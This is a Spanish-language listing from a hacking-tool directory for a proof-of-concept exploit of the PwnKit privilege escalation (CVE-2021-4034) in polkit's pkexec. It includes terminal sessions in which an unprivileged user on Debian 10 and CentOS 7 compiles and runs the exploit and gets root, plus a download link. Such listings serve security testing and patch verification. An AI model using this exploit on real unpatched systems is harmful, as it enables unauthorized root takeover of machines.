Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
POC-CVE-2021-4034 — Prueba de concepto del exploit para CVE-2021-4034 (PwnKit), una escalada de privilegios local en pkexec de polkit, verificada en Debian 10 y CentOS 7. | Kitploit
Herramientas/GitHubGitHub/yakumwamba/poc-cve-2021-4034
Escalada de PrivilegiosFrameworks de ExploitsAnálisis de VulnerabilidadesExplotaciónPruebas de Penetración
GitHubyakumwamba/poc-cve-2021-4034

POC-CVE-2021-4034

Prueba de concepto del exploit para CVE-2021-4034 (PwnKit), una escalada de privilegios local en pkexec de polkit, verificada en Debian 10 y CentOS 7.

Ver Repositorio
423hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

polkit-bug

CVE-2021-4034

Si bien la vulnerabilidad no es explotable de forma remota y, por sí misma, no permite la ejecución arbitraria de código, puede ser utilizada por atacantes que ya han obtenido un punto de apoyo en un host vulnerable para escalar sus privilegios y lograr esa capacidad.

https://seclists.org/oss-sec/2022/q1/80https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034

PoC

Verificado en Debian 10 y CentOS 7.

Puedes encontrar el repositorio en este enlace → https://github.com/Yakumwamba/POC-CVE-2021-4034.git

root@kitploit:~
user@debian:~$ grep PRETTY /etc/os-release
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
user@debian:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
user@debian:~$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
user@debian:~$ ./cve-2021-4034-poc
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(user)
root@kitploit:~
[user@centos ~]$ grep PRETTY /etc/os-release
PRETTY_NAME="CentOS Linux 7 (Core)"
[user@centos ~]$ id
uid=11000(user) gid=11000(user) groups=11000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[user@centos ~]$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
[user@centos ~]$ ./cve-2021-4034-poc
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),11000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2# exit

Descargo de responsabilidad: esta herramienta puede utilizarse con fines malintencionados

También puede utilizarse para dañar o deshabilitar servidores Linux sin parchear. El autor de esta herramienta no es responsable de ningún daño o pérdida que pueda ocurrir como resultado de su uso.

Descargar herramienta